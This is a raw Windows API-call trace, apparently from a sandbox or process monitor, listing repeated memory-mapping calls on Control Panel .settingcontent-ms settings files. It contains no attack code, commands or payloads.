Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Language_Add_Profile.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Language_Add_Profile.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2112 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1968 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2112 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_LeaveOrganization.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_PenAndTouchStatus.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2112 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2176 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2112 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2112 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Privacy_OpenPrivacyStatementLink.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Proxy_AutomaticConfigScript.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Proxy_AutomaticDetection.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Proxy_ManualProxyAddress.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Radio_DeviceList.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Radio_DeviceList.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
